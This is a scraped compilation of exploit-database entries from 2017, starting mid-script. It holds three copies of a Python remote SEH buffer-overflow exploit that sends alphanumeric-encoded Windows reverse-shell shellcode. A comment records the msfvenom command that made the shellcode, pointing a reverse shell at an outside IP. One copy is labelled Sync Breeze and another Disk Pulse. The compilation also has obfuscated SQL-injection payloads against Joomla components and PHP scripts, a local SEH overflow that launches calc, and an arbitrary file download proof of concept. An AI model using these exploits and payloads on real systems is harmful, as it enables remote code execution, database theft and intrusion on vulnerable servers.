buf += "\x89\xe3\xda\xde\xd9\x73\xf4\x5b\x53\x59\x49\x49\x49"
buf += "\x49\x49\x49\x49\x49\x49\x49\x43\x43\x43\x43\x43\x43"
buf += "\x37\x51\x5a\x6a\x41\x58\x50\x30\x41\x30\x41\x6b\x41"
buf += "\x41\x51\x32\x41\x42\x32\x42\x42\x30\x42\x42\x41\x42"
buf += "\x58\x50\x38\x41\x42\x75\x4a\x49\x4b\x4c\x4d\x38\x6d"
buf += "\x52\x35\x50\x37\x70\x65\x50\x71\x70\x6b\x39\x4d\x35"
buf += "\x70\x31\x4b\x70\x63\x54\x6c\x4b\x56\x30\x76\x50\x4c"
buf += "\x4b\x63\x62\x76\x6c\x4c\x4b\x50\x52\x76\x74\x4c\x4b"
buf += "\x42\x52\x36\x48\x34\x4f\x58\x37\x51\x5a\x37\x56\x46"
buf += "\x51\x79\x6f\x6e\x4c\x55\x6c\x31\x71\x51\x6c\x67\x72"
buf += "\x34\x6c\x51\x30\x59\x51\x48\x4f\x36\x6d\x65\x51\x79"
buf += "\x57\x59\x72\x6b\x42\x72\x72\x72\x77\x4c\x4b\x52\x72"
buf += "\x76\x70\x6c\x4b\x61\x5a\x77\x4c\x6e\x6b\x42\x6c\x66"
buf += "\x71\x50\x78\x6a\x43\x32\x68\x75\x51\x6b\x61\x36\x31"
buf += "\x4e\x6b\x70\x59\x47\x50\x75\x51\x7a\x73\x4c\x4b\x30"
buf += "\x49\x66\x78\x79\x73\x64\x7a\x73\x79\x6c\x4b\x45\x64"
buf += "\x4c\x4b\x36\x61\x7a\x76\x50\x31\x6b\x4f\x4e\x4c\x4f"
buf += "\x31\x7a\x6f\x36\x6d\x43\x31\x39\x57\x74\x78\x6b\x50"
buf += "\x31\x65\x6b\x46\x43\x33\x53\x4d\x68\x78\x77\x4b\x33"
buf += "\x4d\x31\x34\x44\x35\x78\x64\x56\x38\x6e\x6b\x36\x38"
buf += "\x75\x74\x56\x61\x78\x53\x65\x36\x4e\x6b\x66\x6c\x30"
buf += "\x4b\x6e\x6b\x33\x68\x65\x4c\x63\x31\x68\x53\x6c\x4b"
buf += "\x65\x54\x4e\x6b\x33\x31\x58\x50\x6e\x69\x43\x74\x31"
buf += "\x34\x65\x74\x53\x6b\x71\x4b\x71\x71\x46\x39\x72\x7a"
buf += "\x53\x61\x39\x6f\x49\x70\x43\x6f\x61\x4f\x61\x4a\x4e"
buf += "\x6b\x44\x52\x78\x6b\x6e\x6d\x33\x6d\x33\x58\x75\x63"
buf += "\x50\x32\x35\x50\x37\x70\x32\x48\x54\x37\x70\x73\x34"
buf += "\x72\x63\x6f\x66\x34\x62\x48\x52\x6c\x52\x57\x44\x66"
buf += "\x43\x37\x39\x6f\x79\x45\x4c\x78\x4e\x70\x43\x31\x45"
buf += "\x50\x57\x70\x34\x69\x6f\x34\x51\x44\x70\x50\x53\x58"
buf += "\x76\x49\x6f\x70\x50\x6b\x33\x30\x79\x6f\x5a\x75\x50"
buf += "\x50\x46\x30\x42\x70\x46\x30\x51\x50\x62\x70\x67\x30"
buf += "\x70\x50\x30\x68\x79\x7a\x56\x6f\x69\x4f\x49\x70\x69"
buf += "\x6f\x48\x55\x6f\x67\x52\x4a\x36\x65\x75\x38\x68\x39"
buf += "\x33\x6c\x6b\x6f\x74\x38\x52\x48\x43\x32\x57\x70\x44"
buf += "\x51\x71\x4b\x4c\x49\x4b\x56\x31\x7a\x72\x30\x56\x36"
buf += "\x50\x57\x63\x58\x6d\x49\x6d\x75\x34\x34\x63\x51\x79"
buf += "\x6f\x4b\x65\x6c\x45\x6b\x70\x43\x44\x36\x6c\x69\x6f"
buf += "\x72\x6e\x76\x68\x52\x55\x48\x6c\x52\x48\x78\x70\x6c"
buf += "\x75\x6f\x52\x52\x76\x4b\x4f\x4e\x35\x42\x48\x43\x53"
buf += "\x50\x6d\x35\x34\x63\x30\x6e\x69\x4d\x33\x62\x77\x43"
buf += "\x67\x56\x37\x75\x61\x39\x66\x42\x4a\x62\x32\x31\x49"
buf += "\x70\x56\x69\x72\x39\x6d\x72\x46\x59\x57\x51\x54\x45"
buf += "\x74\x77\x4c\x33\x31\x46\x61\x4e\x6d\x37\x34\x57\x54"
buf += "\x56\x70\x68\x46\x47\x70\x62\x64\x36\x34\x46\x30\x61"
buf += "\x46\x36\x36\x62\x76\x70\x46\x72\x76\x32\x6e\x61\x46"
buf += "\x30\x56\x56\x33\x70\x56\x73\x58\x53\x49\x48\x4c\x55"
buf += "\x6f\x4f\x76\x49\x6f\x4a\x75\x4f\x79\x39\x70\x52\x6e"
buf += "\x72\x76\x37\x36\x4b\x4f\x56\x50\x61\x78\x65\x58\x4e"
buf += "\x67\x57\x6d\x75\x30\x39\x6f\x59\x45\x6f\x4b\x78\x70"
buf += "\x4d\x65\x4e\x42\x71\x46\x71\x78\x6e\x46\x6c\x55\x4f"
buf += "\x4d\x6f\x6d\x79\x6f\x59\x45\x35\x6c\x53\x36\x53\x4c"
buf += "\x54\x4a\x4d\x50\x6b\x4b\x4b\x50\x54\x35\x65\x55\x6d"
buf += "\x6b\x63\x77\x55\x43\x43\x42\x32\x4f\x63\x5a\x43\x30"
buf += "\x72\x73\x4b\x4f\x48\x55\x41\x41"


payload = buf # Shellcode begins from the start of the buffer
payload += 'A' * (2492   - len(payload)) # Padding after shellcode till the offset value
payload += '\xEB\x10\x90\x90' # NSEH, a short jump of 10 bytes
payload += '\xDD\xAD\x13\x10' # SEH : POP EDI POP ESI RET 04  libpal.dll
payload += '\x90' * 10 # NOPsled
payload += '\xE9\x25\xBF\xFF\xFF' # Second JMP to ShellCode 
payload += 'D' * (5000-len(payload)) # Additional Padding

s  = socket.socket(socket.AF_INET,socket.SOCK_STREAM)
try:
    s.connect((target,port))
    print "[*] Connection Success."
except:
    print "Connction Refused %s:%s" %(target,port)
    sys.exit(2)
    
packet =  "GET /../%s HTTP/1.1\r\n" %payload # Request & Headers
packet += "Host: 4.2.2.2\r\n"
packet += "Connection: keep-alive\r\n"
packet += "Referer: http://pyramidcyber.com\r\n"
packet += "\r\n"
s.send(packet)
s.close()
HireHackking 
#!/usr/bin/env python
# Exploit Title: Sync Breeze Enterprise v9.9.16 Remote SEH Buffer Overflow
# Date: 2017-08-25
# Exploit Author: Nipun Jaswal & Anurag Srivastava
# Author Homepage: www.pyramidcyber.com
# Vendor Homepage: http://www.syncbreeze.com
# Software Link: http://www.syncbreeze.com/setups/syncbreezeent_setup_v9.9.16.exe
# Version: v9.9.16
# Tested on: Windows 7 SP1 x64
# Steps to Reproduce : Go to Options --> Server --> Check Enable Web Server on Port, Enter Any Port[8080] --> Save 
import socket,sys
target = "127.0.0.1"
port = 8080

#msfvenom -p windows/shell_reverse_tcp LHOST=185.92.223.120 LPORT=4443 EXITFUN=none -e x86/alpha_mixed -f python
buf =  ""
buf += "\x89\xe3\xda\xde\xd9\x73\xf4\x5b\x53\x59\x49\x49\x49"
buf += "\x49\x49\x49\x49\x49\x49\x49\x43\x43\x43\x43\x43\x43"
buf += "\x37\x51\x5a\x6a\x41\x58\x50\x30\x41\x30\x41\x6b\x41"
buf += "\x41\x51\x32\x41\x42\x32\x42\x42\x30\x42\x42\x41\x42"
buf += "\x58\x50\x38\x41\x42\x75\x4a\x49\x4b\x4c\x4d\x38\x6d"
buf += "\x52\x35\x50\x37\x70\x65\x50\x71\x70\x6b\x39\x4d\x35"
buf += "\x70\x31\x4b\x70\x63\x54\x6c\x4b\x56\x30\x76\x50\x4c"
buf += "\x4b\x63\x62\x76\x6c\x4c\x4b\x50\x52\x76\x74\x4c\x4b"
buf += "\x42\x52\x36\x48\x34\x4f\x58\x37\x51\x5a\x37\x56\x46"
buf += "\x51\x79\x6f\x6e\x4c\x55\x6c\x31\x71\x51\x6c\x67\x72"
buf += "\x34\x6c\x51\x30\x59\x51\x48\x4f\x36\x6d\x65\x51\x79"
buf += "\x57\x59\x72\x6b\x42\x72\x72\x72\x77\x4c\x4b\x52\x72"
buf += "\x76\x70\x6c\x4b\x61\x5a\x77\x4c\x6e\x6b\x42\x6c\x66"
buf += "\x71\x50\x78\x6a\x43\x32\x68\x75\x51\x6b\x61\x36\x31"
buf += "\x4e\x6b\x70\x59\x47\x50\x75\x51\x7a\x73\x4c\x4b\x30"
buf += "\x49\x66\x78\x79\x73\x64\x7a\x73\x79\x6c\x4b\x45\x64"
buf += "\x4c\x4b\x36\x61\x7a\x76\x50\x31\x6b\x4f\x4e\x4c\x4f"
buf += "\x31\x7a\x6f\x36\x6d\x43\x31\x39\x57\x74\x78\x6b\x50"
buf += "\x31\x65\x6b\x46\x43\x33\x53\x4d\x68\x78\x77\x4b\x33"
buf += "\x4d\x31\x34\x44\x35\x78\x64\x56\x38\x6e\x6b\x36\x38"
buf += "\x75\x74\x56\x61\x78\x53\x65\x36\x4e\x6b\x66\x6c\x30"
buf += "\x4b\x6e\x6b\x33\x68\x65\x4c\x63\x31\x68\x53\x6c\x4b"
buf += "\x65\x54\x4e\x6b\x33\x31\x58\x50\x6e\x69\x43\x74\x31"
buf += "\x34\x65\x74\x53\x6b\x71\x4b\x71\x71\x46\x39\x72\x7a"
buf += "\x53\x61\x39\x6f\x49\x70\x43\x6f\x61\x4f\x61\x4a\x4e"
buf += "\x6b\x44\x52\x78\x6b\x6e\x6d\x33\x6d\x33\x58\x75\x63"
buf += "\x50\x32\x35\x50\x37\x70\x32\x48\x54\x37\x70\x73\x34"
buf += "\x72\x63\x6f\x66\x34\x62\x48\x52\x6c\x52\x57\x44\x66"
buf += "\x43\x37\x39\x6f\x79\x45\x4c\x78\x4e\x70\x43\x31\x45"
buf += "\x50\x57\x70\x34\x69\x6f\x34\x51\x44\x70\x50\x53\x58"
buf += "\x76\x49\x6f\x70\x50\x6b\x33\x30\x79\x6f\x5a\x75\x50"
buf += "\x50\x46\x30\x42\x70\x46\x30\x51\x50\x62\x70\x67\x30"
buf += "\x70\x50\x30\x68\x79\x7a\x56\x6f\x69\x4f\x49\x70\x69"
buf += "\x6f\x48\x55\x6f\x67\x52\x4a\x36\x65\x75\x38\x68\x39"
buf += "\x33\x6c\x6b\x6f\x74\x38\x52\x48\x43\x32\x57\x70\x44"
buf += "\x51\x71\x4b\x4c\x49\x4b\x56\x31\x7a\x72\x30\x56\x36"
buf += "\x50\x57\x63\x58\x6d\x49\x6d\x75\x34\x34\x63\x51\x79"
buf += "\x6f\x4b\x65\x6c\x45\x6b\x70\x43\x44\x36\x6c\x69\x6f"
buf += "\x72\x6e\x76\x68\x52\x55\x48\x6c\x52\x48\x78\x70\x6c"
buf += "\x75\x6f\x52\x52\x76\x4b\x4f\x4e\x35\x42\x48\x43\x53"
buf += "\x50\x6d\x35\x34\x63\x30\x6e\x69\x4d\x33\x62\x77\x43"
buf += "\x67\x56\x37\x75\x61\x39\x66\x42\x4a\x62\x32\x31\x49"
buf += "\x70\x56\x69\x72\x39\x6d\x72\x46\x59\x57\x51\x54\x45"
buf += "\x74\x77\x4c\x33\x31\x46\x61\x4e\x6d\x37\x34\x57\x54"
buf += "\x56\x70\x68\x46\x47\x70\x62\x64\x36\x34\x46\x30\x61"
buf += "\x46\x36\x36\x62\x76\x70\x46\x72\x76\x32\x6e\x61\x46"
buf += "\x30\x56\x56\x33\x70\x56\x73\x58\x53\x49\x48\x4c\x55"
buf += "\x6f\x4f\x76\x49\x6f\x4a\x75\x4f\x79\x39\x70\x52\x6e"
buf += "\x72\x76\x37\x36\x4b\x4f\x56\x50\x61\x78\x65\x58\x4e"
buf += "\x67\x57\x6d\x75\x30\x39\x6f\x59\x45\x6f\x4b\x78\x70"
buf += "\x4d\x65\x4e\x42\x71\x46\x71\x78\x6e\x46\x6c\x55\x4f"
buf += "\x4d\x6f\x6d\x79\x6f\x59\x45\x35\x6c\x53\x36\x53\x4c"
buf += "\x54\x4a\x4d\x50\x6b\x4b\x4b\x50\x54\x35\x65\x55\x6d"
buf += "\x6b\x63\x77\x55\x43\x43\x42\x32\x4f\x63\x5a\x43\x30"
buf += "\x72\x73\x4b\x4f\x48\x55\x41\x41"


payload = buf # Shellcode begins from the start of the buffer
payload += 'A' * (2492   - len(payload)) # Padding after shellcode till the offset value
payload += '\xEB\x10\x90\x90' # NSEH, a short jump of 10 bytes
payload += '\xDD\xAD\x13\x10' # SEH : POP EDI POP ESI RET 04  libpal.dll
payload += '\x90' * 10 # NOPsled
payload += '\xE9\x25\xBF\xFF\xFF' # Second JMP to ShellCode 
payload += 'D' * (5000-len(payload)) # Additional Padding

s  = socket.socket(socket.AF_INET,socket.SOCK_STREAM)
try:
    s.connect((target,port))
    print "[*] Connection Success."
except:
    print "Connction Refused %s:%s" %(target,port)
    sys.exit(2)
    
packet =  "GET /../%s HTTP/1.1\r\n" %payload # Request & Headers
packet += "Host: 4.2.2.2\r\n"
packet += "Connection: keep-alive\r\n"
packet += "Referer: http://pyramidcyber.com\r\n"
packet += "\r\n"
s.send(packet)
s.close()
HireHackking 
#!/usr/bin/env python
# Exploit Title: Disk Pulse Enterprise 9.9.16 Remote SEH Buffer Overflow
# Date: 2017-08-25
# Exploit Author: Nipun Jaswal & Anurag Srivastava
# Author Homepage: www.pyramidcyber.com
# Vendor Homepage: http://www.diskpulse.com
# Software Link: http://www.diskpulse.com/setups/diskpulseent_setup_v9.9.16.exe
# Version: v9.9.16
# Tested on: Windows 7 SP1 x64
# Steps to Reproduce : Go to Options --> Server --> Check Enable Web Server on Port, Enter Any Port[8080] --> Save 
import socket,sys
target = "127.0.0.1"
port = 8080

#msfvenom -p windows/shell_reverse_tcp LHOST=185.92.223.120 LPORT=4443 EXITFUN=none -e x86/alpha_mixed -f python
buf =  ""
buf += "\x89\xe3\xda\xde\xd9\x73\xf4\x5b\x53\x59\x49\x49\x49"
buf += "\x49\x49\x49\x49\x49\x49\x49\x43\x43\x43\x43\x43\x43"
buf += "\x37\x51\x5a\x6a\x41\x58\x50\x30\x41\x30\x41\x6b\x41"
buf += "\x41\x51\x32\x41\x42\x32\x42\x42\x30\x42\x42\x41\x42"
buf += "\x58\x50\x38\x41\x42\x75\x4a\x49\x4b\x4c\x4d\x38\x6d"
buf += "\x52\x35\x50\x37\x70\x65\x50\x71\x70\x6b\x39\x4d\x35"
buf += "\x70\x31\x4b\x70\x63\x54\x6c\x4b\x56\x30\x76\x50\x4c"
buf += "\x4b\x63\x62\x76\x6c\x4c\x4b\x50\x52\x76\x74\x4c\x4b"
buf += "\x42\x52\x36\x48\x34\x4f\x58\x37\x51\x5a\x37\x56\x46"
buf += "\x51\x79\x6f\x6e\x4c\x55\x6c\x31\x71\x51\x6c\x67\x72"
buf += "\x34\x6c\x51\x30\x59\x51\x48\x4f\x36\x6d\x65\x51\x79"
buf += "\x57\x59\x72\x6b\x42\x72\x72\x72\x77\x4c\x4b\x52\x72"
buf += "\x76\x70\x6c\x4b\x61\x5a\x77\x4c\x6e\x6b\x42\x6c\x66"
buf += "\x71\x50\x78\x6a\x43\x32\x68\x75\x51\x6b\x61\x36\x31"
buf += "\x4e\x6b\x70\x59\x47\x50\x75\x51\x7a\x73\x4c\x4b\x30"
buf += "\x49\x66\x78\x79\x73\x64\x7a\x73\x79\x6c\x4b\x45\x64"
buf += "\x4c\x4b\x36\x61\x7a\x76\x50\x31\x6b\x4f\x4e\x4c\x4f"
buf += "\x31\x7a\x6f\x36\x6d\x43\x31\x39\x57\x74\x78\x6b\x50"
buf += "\x31\x65\x6b\x46\x43\x33\x53\x4d\x68\x78\x77\x4b\x33"
buf += "\x4d\x31\x34\x44\x35\x78\x64\x56\x38\x6e\x6b\x36\x38"
buf += "\x75\x74\x56\x61\x78\x53\x65\x36\x4e\x6b\x66\x6c\x30"
buf += "\x4b\x6e\x6b\x33\x68\x65\x4c\x63\x31\x68\x53\x6c\x4b"
buf += "\x65\x54\x4e\x6b\x33\x31\x58\x50\x6e\x69\x43\x74\x31"
buf += "\x34\x65\x74\x53\x6b\x71\x4b\x71\x71\x46\x39\x72\x7a"
buf += "\x53\x61\x39\x6f\x49\x70\x43\x6f\x61\x4f\x61\x4a\x4e"
buf += "\x6b\x44\x52\x78\x6b\x6e\x6d\x33\x6d\x33\x58\x75\x63"
buf += "\x50\x32\x35\x50\x37\x70\x32\x48\x54\x37\x70\x73\x34"
buf += "\x72\x63\x6f\x66\x34\x62\x48\x52\x6c\x52\x57\x44\x66"
buf += "\x43\x37\x39\x6f\x79\x45\x4c\x78\x4e\x70\x43\x31\x45"
buf += "\x50\x57\x70\x34\x69\x6f\x34\x51\x44\x70\x50\x53\x58"
buf += "\x76\x49\x6f\x70\x50\x6b\x33\x30\x79\x6f\x5a\x75\x50"
buf += "\x50\x46\x30\x42\x70\x46\x30\x51\x50\x62\x70\x67\x30"
buf += "\x70\x50\x30\x68\x79\x7a\x56\x6f\x69\x4f\x49\x70\x69"
buf += "\x6f\x48\x55\x6f\x67\x52\x4a\x36\x65\x75\x38\x68\x39"
buf += "\x33\x6c\x6b\x6f\x74\x38\x52\x48\x43\x32\x57\x70\x44"
buf += "\x51\x71\x4b\x4c\x49\x4b\x56\x31\x7a\x72\x30\x56\x36"
buf += "\x50\x57\x63\x58\x6d\x49\x6d\x75\x34\x34\x63\x51\x79"
buf += "\x6f\x4b\x65\x6c\x45\x6b\x70\x43\x44\x36\x6c\x69\x6f"
buf += "\x72\x6e\x76\x68\x52\x55\x48\x6c\x52\x48\x78\x70\x6c"
buf += "\x75\x6f\x52\x52\x76\x4b\x4f\x4e\x35\x42\x48\x43\x53"
buf += "\x50\x6d\x35\x34\x63\x30\x6e\x69\x4d\x33\x62\x77\x43"
buf += "\x67\x56\x37\x75\x61\x39\x66\x42\x4a\x62\x32\x31\x49"
buf += "\x70\x56\x69\x72\x39\x6d\x72\x46\x59\x57\x51\x54\x45"
buf += "\x74\x77\x4c\x33\x31\x46\x61\x4e\x6d\x37\x34\x57\x54"
buf += "\x56\x70\x68\x46\x47\x70\x62\x64\x36\x34\x46\x30\x61"
buf += "\x46\x36\x36\x62\x76\x70\x46\x72\x76\x32\x6e\x61\x46"
buf += "\x30\x56\x56\x33\x70\x56\x73\x58\x53\x49\x48\x4c\x55"
buf += "\x6f\x4f\x76\x49\x6f\x4a\x75\x4f\x79\x39\x70\x52\x6e"
buf += "\x72\x76\x37\x36\x4b\x4f\x56\x50\x61\x78\x65\x58\x4e"
buf += "\x67\x57\x6d\x75\x30\x39\x6f\x59\x45\x6f\x4b\x78\x70"
buf += "\x4d\x65\x4e\x42\x71\x46\x71\x78\x6e\x46\x6c\x55\x4f"
buf += "\x4d\x6f\x6d\x79\x6f\x59\x45\x35\x6c\x53\x36\x53\x4c"
buf += "\x54\x4a\x4d\x50\x6b\x4b\x4b\x50\x54\x35\x65\x55\x6d"
buf += "\x6b\x63\x77\x55\x43\x43\x42\x32\x4f\x63\x5a\x43\x30"
buf += "\x72\x73\x4b\x4f\x48\x55\x41\x41"


payload = buf # Shellcode begins from the start of the buffer
payload += 'A' * (2492   - len(payload)) # Padding after shellcode till the offset value
payload += '\xEB\x10\x90\x90' # NSEH, a short jump of 10 bytes
payload += '\xDD\xAD\x13\x10' # SEH : POP EDI POP ESI RET 04  libpal.dll
payload += '\x90' * 10 # NOPsled
payload += '\xE9\x25\xBF\xFF\xFF' # Second JMP to ShellCode 
payload += 'D' * (5000-len(payload)) # Additional Padding

s  = socket.socket(socket.AF_INET,socket.SOCK_STREAM)
try:
    s.connect((target,port))
    print "[*] Connection Success."
except:
    print "Connction Refused %s:%s" %(target,port)
    sys.exit(2)
    
packet =  "GET /../%s HTTP/1.1\r\n" %payload # Request & Headers
packet += "Host: 4.2.2.2\r\n"
packet += "Connection: keep-alive\r\n"
packet += "Referer: http://pyramidcyber.com\r\n"
packet += "\r\n"
s.send(packet)
s.close()
HireHackking 
# # # # # 
# Exploit Title: Joomla! Component OSDownloads 1.7.4 - SQL Injection
# Dork: N/A
# Date: 25.08.2017
# Vendor Homepage: https://joomlashack.com/
# Software Link: https://extensions.joomla.org/extensions/extension/directory-a-documentation/downloads/osdownloads/
# Demo: https://demoextensions.joomlashack.com/osdownloads
# Version: 1.7.4
# Category: Webapps
# Tested on: WiN7_x64/KaLiLinuX_x64
# CVE: N/A
# # # # #
# Exploit Author: Ihsan Sencan
# Author Web: http://ihsan.net
# Author Social: @ihsansencan
# # # # #
# Description:
# The vulnerability allows an attacker to inject sql commands....
# 	
# Proof of Concept:
# 
# http://localhost/[PATH]/index.php?option=com_osdownloads&view=item&id=[SQL]
#
# 8+aND(/*!22200sELeCT*/+0x30783331+/*!22200FrOM*/+(/*!22200SeLeCT*/+cOUNT(*),/*!22200CoNCaT*/((sELEcT(sELECT+/*!22200CoNCAt*/(cAST(dATABASE()+aS+cHAR),0x7e,0x496873616E53656e63616e))+fROM+iNFORMATION_sCHEMA.tABLES+wHERE+tABLE_sCHEMA=dATABASE()+lIMIT+0,1),fLOOR(rAND(0)*2))x+fROM+iNFORMATION_sCHEMA.tABLES+gROUP+bY+x)a)+AND+1=1
#
# Etc..
# # # # #
HireHackking 
# #
# Exploit Title: Auto Car - Car listing Script 1.1 - SQL Injection
# Dork: N/A
# Date: 25.08.2017
# Vendor: http://kamleshyadav.com/
# Software Link: https://codecanyon.net/item/auto-car-car-listing-script/19221368
# Demo: http://kamleshyadav.com/scripts/autocar_preview/
# Version: 1.1
# Tested on: WiN10_X64
# Exploit Author: Bora Bozdogan
# Author WebSite : http://borabozdogan.net.tr
# Author E-mail : borayazilim45@mit.tc
# #	
# POC:
# 
# http://localhost/[PATH]/search-cars?category=[SQL]
# ts_user
#  user_uname
#  user_fname
#  user_lname
#  user_email
#  user_pwd
# #
HireHackking 
# # # # # 
# Exploit Title: Joomla! Component Photo Contest 1.0.2- SQL Injection
# Dork: N/A
# Date: 25.08.2017
# Vendor Homepage: http://keenitsolution.com/
# Software Link: https://codecanyon.net/item/photo-contest-joomla-extension/13268866
# Demo: http://photo.keenitsolution.com/
# Version: 1.0.2
# Category: Webapps
# Tested on: WiN7_x64/KaLiLinuX_x64
# CVE: N/A
# # # # #
# Exploit Author: Ihsan Sencan
# Author Web: http://ihsan.net
# Author Social: @ihsansencan
# # # # #
# Description:
# The vulnerability allows an attacker to inject sql commands....
# 	
# Proof of Concept:
# 
# http://localhost/[PATH]/photo-contest/photocontest/vote?controller=photocontest&vid=[SQL]
#
# 1'aND+(/*!22200sEleCT*/+1+/*!22200FrOM*/+(/*!22200sEleCT*/+cOUNT(*),/*!22200CoNCAt*/((/*!22200sEleCT*/(/*!22200sEleCT*/+/*!22200CoNCAt*/(cAst(dATABASE()+As+char),0x7e,0x496873616E53656e63616e))+/*!22200FrOM*/+infOrMation_schEma.tables+where+table_schema=dATABASE()+limit+0,1),floor(raND(0)*2))x+/*!22200FrOM*/+infOrMation_schEma.tABLES+/*!22200gROUP*/+bY+x)a)+aND+''='
#
# Etc..
# # # # #
HireHackking 
# # # # # 
# Exploit Title: Joomla! Component RPC - Responsive Portfolio 1.6.1 - SQL Injection
# Dork: N/A
# Date: 25.08.2017
# Vendor Homepage: https://extro.media/
# Software Link: https://extensions.joomla.org/extension/rpc-responsive-portfolio/
# Demo: https://demo.extro.media/responsive-joomla-extensions-en/video-en
# Version: 1.6.1
# Category: Webapps
# Tested on: WiN7_x64/KaLiLinuX_x64
# CVE: N/A
# # # # #
# Exploit Author: Ihsan Sencan
# Author Web: http://ihsan.net
# Author Social: @ihsansencan
# # # # #
# Description:
# The vulnerability allows an attacker to inject sql commands....
# 	
# Proof of Concept:
# 
# http://localhost/[PATH]/index.php?option=com_pofos&view=pofo&id=[SQL]
#
# Etc..
# # # # #
HireHackking 
#!/usr/bin/python

#========================================================================================================================
# Exploit Author     :  Touhid M.Shaikh
# Exploit Title      : Easy RM RMVB to DVD Burner 1.8.11 - 'Enter User
Name' Field Buffer Overflow (SEH)
# Date :  28-08-2017
# Website : www.touhidshaikh.com
# Contact : https://github.com/touhidshaikh
# Vulnerable Software:  Easy RM RMVB to DVD Burner
# Vendor Homepage:      http://www.divxtodvd.net/
# Version:              1.8.11
# Software Link:        http://www.divxtodvd.net/easy_rm_to_dvd.exe
# Tested On:            Windows 7 x86
#
#
# To reproduce the exploit:
#   1. Click Register
#   2. In the "Enter User Name" field, paste the content of calc.txt
#
#========================================================================================================================


buffer = "\x41" * 1008

nSEH = "\xeb\x10\x90\x90"

# 0x10037859 : pop esi # pop ebx # ret 0x04 | ascii {PAGE_EXECUTE_READ}
[SkinMagic.dll] ASLR: False, Rebase: False, SafeSEH: False, OS: False
SEH = "\x59\x78\x03\x10"

badchars = "\x00\x0a\x0d" # and 0x80 to 0xff

# msfvenom -p windows/exec CMD=calc.exe -b "\x00\x0a\x0d" -f python
buf =  ""
buf += "\xda\xd7\xd9\x74\x24\xf4\xba\x07\xc8\xf9\x11\x5e\x2b"
buf += "\xc9\xb1\x31\x31\x56\x18\x03\x56\x18\x83\xee\xfb\x2a"
buf += "\x0c\xed\xeb\x29\xef\x0e\xeb\x4d\x79\xeb\xda\x4d\x1d"
buf += "\x7f\x4c\x7e\x55\x2d\x60\xf5\x3b\xc6\xf3\x7b\x94\xe9"
buf += "\xb4\x36\xc2\xc4\x45\x6a\x36\x46\xc5\x71\x6b\xa8\xf4"
buf += "\xb9\x7e\xa9\x31\xa7\x73\xfb\xea\xa3\x26\xec\x9f\xfe"
buf += "\xfa\x87\xd3\xef\x7a\x7b\xa3\x0e\xaa\x2a\xb8\x48\x6c"
buf += "\xcc\x6d\xe1\x25\xd6\x72\xcc\xfc\x6d\x40\xba\xfe\xa7"
buf += "\x99\x43\xac\x89\x16\xb6\xac\xce\x90\x29\xdb\x26\xe3"
buf += "\xd4\xdc\xfc\x9e\x02\x68\xe7\x38\xc0\xca\xc3\xb9\x05"
buf += "\x8c\x80\xb5\xe2\xda\xcf\xd9\xf5\x0f\x64\xe5\x7e\xae"
buf += "\xab\x6c\xc4\x95\x6f\x35\x9e\xb4\x36\x93\x71\xc8\x29"
buf += "\x7c\x2d\x6c\x21\x90\x3a\x1d\x68\xfe\xbd\x93\x16\x4c"
buf += "\xbd\xab\x18\xe0\xd6\x9a\x93\x6f\xa0\x22\x76\xd4\x5e"
buf += "\x69\xdb\x7c\xf7\x34\x89\x3d\x9a\xc6\x67\x01\xa3\x44"
buf += "\x82\xf9\x50\x54\xe7\xfc\x1d\xd2\x1b\x8c\x0e\xb7\x1b"
buf += "\x23\x2e\x92\x7f\xa2\xbc\x7e\xae\x41\x45\xe4\xae"

nops = "\x90" * 16

data = buffer + nSEH + SEH + nops + buf

f = open ("calc.txt", "w")
f.write(data)
f.close()

#Greetz => Jack Carlo
HireHackking 
# # # # # 
# Exploit Title: WYSIWYG HTML Editor PRO 1.0 - Arbitrary File Download
# Dork: N/A
# Date: 28.08.2017
# Vendor Homepage: http://nelliwinne.net/
# Software Link: https://codecanyon.net/item/wysiwyg-html-editor-pro-php-based-editor-with-image-uploader-and-more/19012022
# Demo: http://codecanyon.nelliwinne.net/WYSIWYGEditorPRO/
# Version: 1.0
# Category: Webapps
# Tested on: WiN7_x64/KaLiLinuX_x64
# CVE: N/A
# # # # #
# Exploit Author: Ihsan Sencan
# Author Web: http://ihsan.net
# Author Social: @ihsansencan
# # # # #
# Description:
# The security obligation allows an attacker to arbitrary download files..
#
# Vulnerable Source:
#
# .............
# <?php
# $file = base64_decode($_GET['id']);
# 
# if (file_exists($file)) {
#     header('Content-Description: File Transfer');
#     header('Content-Type: application/octet-stream');
#     header('Content-Disposition: attachment; filename="'.basename($file).'"');
#     header('Expires: 0');
#     header('Cache-Control: must-revalidate');
#     header('Pragma: public');
#     header('Content-Length: ' . filesize($file));
#     readfile($file);
#     exit;
# }
# ?>
# .............
# Proof of Concept:
#
# http://localhost/[PATH]/wysiwyg/download.php?id=[FILENAME_to_BASE64]
# 
# Etc...
# # # # #
HireHackking 
# # # # # 
# Exploit Title: FTP Made Easy PRO 1.2 - SQL Injection
# Dork: N/A
# Date: 28.08.2017
# Vendor Homepage: http://nelliwinne.net/
# Software Link: https://codecanyon.net/item/ftp-made-easy-pro-php-multiple-ftp-manager-client-with-code-editor/17460747
# Demo: http://codecanyon.nelliwinne.net/FTPMadeEasyPRO/
# Version: 1.2
# Category: Webapps
# Tested on: WiN7_x64/KaLiLinuX_x64
# CVE: N/A
# # # # #
# Exploit Author: Ihsan Sencan
# Author Web: http://ihsan.net
# Author Social: @ihsansencan
# # # # #
# Description:
# The vulnerability allows an attacker to inject sql commands....
# 	
# Proof of Concept:
# 
# http://localhost/[PATH]/admin-ftp-del.php?id=[SQL]
# http://localhost/[PATH]/admin-ftp-change.php?id=[SQL]
#
# 755'AnD+(/*!44455sEleCT*/+0x31+/*!44455FrOM*/+(/*!44455sEleCT*/+cOUNT(*),/*!44455CoNCAt*/((/*!44455sEleCT*/(/*!44455sEleCT*/+/*!44455CoNCAt*/(cAst(dATABASE()+As+char),0x7e,0x496873616E53656e63616e))+/*!44455FrOM*/+infOrMation_schEma.tables+/*!44455WherE*/+table_schema=dATABASE()+limit+0,1),floor(raND(0)*2))x+/*!44455FrOM*/+infOrMation_schEma.tABLES+/*!44455gROUP*/+bY+x)a)+aND+''='
#
# Etc..
# # # # #
HireHackking 
# # # # # 
# Exploit Title: Smart Chat - PHP Script 1.0.0 - Authentication Bypass
# Dork: N/A
# Date: 28.08.2017
# Vendor Homepage: http://codesgit.com/
# Software Link: https://www.codester.com/items/997/smart-chat-php-script
# Demo: http://demos.codesgit.com/smartchat/
# Version: 1.0.0
# Category: Webapps
# Tested on: WiN7_x64/KaLiLinuX_x64
# CVE: N/A
# # # # #
# Exploit Author: Ihsan Sencan
# Author Web: http://ihsan.net
# Author Social: @ihsansencan
# # # # #
# Description:
